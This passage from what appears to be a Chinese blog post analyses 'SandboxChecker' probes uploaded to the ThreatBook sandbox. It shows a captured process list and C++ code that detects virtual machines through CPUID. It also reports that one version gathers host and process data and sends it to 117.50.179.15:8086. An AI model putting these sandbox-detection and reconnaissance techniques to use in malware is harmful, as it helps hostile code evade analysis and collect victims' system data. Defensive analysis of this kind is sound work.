class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">820</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">fontdrvhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">848</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">940</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dwm.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">360</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">696</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1060</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1072</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1108</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1184</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1232</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1272</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1280</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1312</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1320</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1412</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1440</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1464</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1656</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1756</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1824</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1980</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2044</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1192</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">spoolsv.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2148</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2276</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2476</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2484</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2492</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">AcrylicService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2564</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2580</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2592</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2752</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3020</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2412</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3084</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3324</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3352</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3488</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ctfmon.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3576</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">explorer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3792</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sppsvc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4060</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ChsIME.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4080</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SppExtComObj.Exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3956</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">StartMenuExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4120</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4128</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4160</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4248</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4368</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ApplicationFrameHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4672</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdge.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4692</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">browser_broker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4816</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4892</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">dllhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4972</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Windows.WARP.JITService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4984</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5088</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeSH.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4428</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MicrosoftEdgeCP.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4460</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WindowsInternal.ComposableShell.Experiences.TextInput.InputApp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5264</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5536</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5960</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6120</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4916</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TrustedInstaller.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5644</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">TiWorker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5500</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2600</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4744</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">6076</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5992</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3940</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5592</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">MjUVfuNpXl.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">unsecapp.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2896</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">Detonate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1372</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1260</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdateSetup.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">clamd.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1612</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1684</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">taskhostw.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2552</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RemindersServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2432</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">backgroundTaskHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1936</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">UniversalAVService.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4196</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">audiodg.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">1424</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">EverythingServer.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4336</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WUDFHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4840</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">GoogleUpdate.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5892</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WeChat.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3236</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">sihost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5200</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">WmiPrvSE.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5192</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">QQ.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2720</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">3244</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">BackgroundTransferHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5520</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5104</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">ShellExperienceHost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2548</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">RuntimeBroker.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4240</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">5928</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">SandboxCheck.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">448</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">conhost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">2272</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">svchost.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">4348</span><br><span class=\"hljs-attr\">Process Name:</span> <span class=\"hljs-string\">calc.exe,</span> <span class=\"hljs-attr\">PID:</span> <span class=\"hljs-number\">464</span><br><br></code></pre></td></tr></table></figure>\n\n\n\n\n\n<h2 id=\"END\"><a href=\"#END\" class=\"headerlink\" title=\"END\"></a>END</h2><p>就此似乎结束了 他没有更新新的东西</p>\n<p>他似乎发现了绕过微步的小技巧,但是总感觉这个技巧有点灵车)</p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"微步沙箱分析-Day2\"><a href=\"#微步沙箱分析-Day2\" class=\"headerlink\" title=\"微步沙箱分析-Day2\"></a>微步沙箱分析-Day2</h1><p>这篇文章的兴趣来源是某位大哥在疯狂的上传SandboxChecker,所以我来按时间分析一下他的实验成果.</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405151713354.png\"></p>\n<h2 id=\"SandboxChecker-V1-0\"><a href=\"#SandboxChecker-V1-0\" class=\"headerlink\" title=\"SandboxChecker V1.0\"></a>SandboxChecker V1.0</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405153807865.png\"></p>\n<p>大概是最初的版本,只检测了CPU制造商和是否支持SSE</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405154224572.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405154400833.png\"></p>\n<h2 id=\"SandboxChecker-V1-1\"><a href=\"#SandboxChecker-V1-1\" class=\"headerlink\" title=\"SandboxChecker V1.1\"></a>SandboxChecker V1.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405154432457.png\"></p>\n<p>在经过40分钟后,又上传了新的SandboxChecker 我称之为V1.1 小版本号更新一下吧 虽然功能完全不一致</p>\n<p>V1.1版本则开始试图读取虚拟化信息了.</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405155035221.png\"></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405155019955.png\"></p>\n<p>但是这种检测方式还是比较容易绕过的Like:</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405160457432.png\"></p>\n<p>所以相对来说针对沙箱是无效的,所以我们来看一看更新的版本</p>\n<h2 id=\"SandboxChecker-V1-1-1\"><a href=\"#SandboxChecker-V1-1-1\" class=\"headerlink\" title=\"SandboxChecker V1.1.1\"></a>SandboxChecker V1.1.1</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405161340796.png\"></p>\n<p>哦,好吧. 我准备将V1.2版本号更改成V1.1.1 因为这个跟V1.1基本没有什么区别 只是改了一点点输出</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405161442896.png\"></p>\n<blockquote>\n<p>注:当 RAX 寄存器被设置为 0x40000000 时 CPUID 返回的信息是 “VMXh”（Virtual Machine eXtensions）这些信息用于检测 CPU 是否支持虚拟化技术。</p>\n</blockquote>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405161605646.png\"></p>\n<p>附代码:</p>\n<figure class=\"highlight c++\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs c++\"><span class=\"hljs-meta\">#<span class=\"hljs-keyword\">include</span> <span class=\"hljs-string\">&lt;iostream&gt;</span></span><br><span class=\"hljs-meta\">#<span class=\"hljs-keyword\">include</span> <span class=\"hljs-string\">&lt;cstring&gt;</span></span><br><br><span class=\"hljs-function\"><span class=\"hljs-type\">void</span> <span class=\"hljs-title\">cpuid</span><span class=\"hljs-params\">(<span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> op, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *eax, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *ebx, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *ecx, <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> *edx)</span> </span>&#123;<br>    __asm__(<br>            <span class=\"hljs-string\">&quot;cpuid;&quot;</span><br>            : <span class=\"hljs-string\">&quot;=a&quot;</span> (*eax), <span class=\"hljs-string\">&quot;=b&quot;</span> (*ebx), <span class=\"hljs-string\">&quot;=c&quot;</span> (*ecx), <span class=\"hljs-string\">&quot;=d&quot;</span> (*edx)<br>            : <span class=\"hljs-string\">&quot;a&quot;</span> (op)<br>            );<br>&#125;<br><br><span class=\"hljs-function\"><span class=\"hljs-type\">int</span> <span class=\"hljs-title\">main</span><span class=\"hljs-params\">()</span> </span>&#123;<br>    <span class=\"hljs-type\">unsigned</span> <span class=\"hljs-type\">int</span> eax, ebx, ecx, edx;<br><br>    <span class=\"hljs-comment\">// 查询扩展的 CPUID 信息</span><br>    <span class=\"hljs-built_in\">cpuid</span>(<span class=\"hljs-number\">0x40000000</span>, &amp;eax, &amp;ebx, &amp;ecx, &amp;edx);<br><br>    <span class=\"hljs-type\">char</span> signature[<span class=\"hljs-number\">13</span>] = &#123;<span class=\"hljs-number\">0</span>&#125;;<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">0</span>], &amp;ebx, <span class=\"hljs-number\">4</span>);<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">4</span>], &amp;ecx, <span class=\"hljs-number\">4</span>);<br>    <span class=\"hljs-built_in\">memcpy</span>(&amp;signature[<span class=\"hljs-number\">8</span>], &amp;edx, <span class=\"hljs-number\">4</span>);<br><br>    std::cout &lt;&lt; <span class=\"hljs-string\">&quot;VMXh: &quot;</span> &lt;&lt; signature &lt;&lt; std::endl;<br><br>    <span class=\"hljs-keyword\">return</span> <span class=\"hljs-number\">0</span>;<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n\n\n<h2 id=\"SandboxChecker-V1-2\"><a href=\"#SandboxChecker-V1-2\" class=\"headerlink\" title=\"SandboxChecker V1.2\"></a>SandboxChecker V1.2</h2><p><img src=\"/../img/TBSandbox-Day2/image-20240405161932160.png\"></p>\n<p>在历时8个小时后 又开始了新的尝试.本次代码变动比较大(我挺想叫他V2.0的)</p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405162501691.png\"></p>\n<p>开始获取计算机名称,系统信息,磁盘信息.并且会遍历<code>C:\\Windows\\Performance\\WinSAT\\DataStore\\*</code>下所有文件 </p>\n<p>通过<code>CreateToolhelp32Snapshot</code>创建进程快照来遍历进程, 随后将获取到的信息发送至<code>117.50.179.15:8086</code></p>\n<p><img src=\"/../img/TBSandbox-Day2/image-20240405163028493.png\"></p>\n<p>抓包后内容:</p>\n<figure class=\"highlight yaml\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br><span class=\"line\">40</span><br><span class=\"line\">41</span><br><span class=\"line\">42</span><br><span class=\"line\">43</span><br><span class=\"line\">44</span><br><span class=\"line\">45</span><br><span class=\"line\">46</span><br><span class=\"line\">47</span><br><span class=\"line\">48</span><br><span class=\"line\">49</span><br><span class=\"line\">50</span><br><span class=\"line\">51</span><br><span class=\"line\">52</span><br><span class=\"line\">53</span><br><span class=\"line\">54</span><br><span class=\"line\">55</span><br><span class=\"line\">56</span><br><span class=\"line\">57</span><br><span class=\"line\">58</span><br><span class=\"line\">59</span><br><span class=\"line\">60</span><br><span class=\"line\">61</span><br><span class=\"line\">62</span><br><span class=\"line\">63</span><br><span class=\"line\">64</span><br><span class=\"line\">65</span><br><span class=\"line\">66</span><br><span class=\"line\">67</span><br><span class=\"line\">68</span><br><span class=\"line\">69</span><br><span class=\"line\">70</span><br><span class=\"line\">71</span><br><span class=\"line\">72</span><br><span class=\"line\">73</span><br><span class=\"line\">74</span><br><span class=\"line\">75</span><br><span class=\"line\">76</span><br><span class=\"line\">77</span><br><span class=\"line\">78</span><br><span class=\"line\">79</span><br><span class=\"line\">80</span><br><span class=\"line\">81</span><br><span class=\"line\">82</span><br><span class=\"line\">83</span><br><span class=\"line\">84</span><br><span class=\"line\">85</span><br><span class=\"line\">86</span><br><span class=\"line\">87</span><br><span class=\"line\">88</span><br><span class=\"line\">89</span><br><span class=\"line\">90</span><br><span class=\"line\">91</span><br><span class=\"line\">92</span><br><span class=\"line\">93</span><br><span class=\"line\">94</span><br><span class=\"line\">95</span><br><span class=\"line\">96</span><br><span class=\"line\">97</span><br><span class=\"line\">98</span><br><span class=\"line\">99</span><br><span class=\"line\">100</span><br><span class=\"line\">101</span><br><span class=\"line\">102</span><br><span class=\"line\">103</span><br><span class=\"line\">104</span><br><span class=\"line\">105</span><br><span class=\"line\">106</span><br><span class=\"line\">107</span><br><span class=\"line\">108</span><br><span class=\"line\">109</span><br><span class=\"line\">110</span><br><span 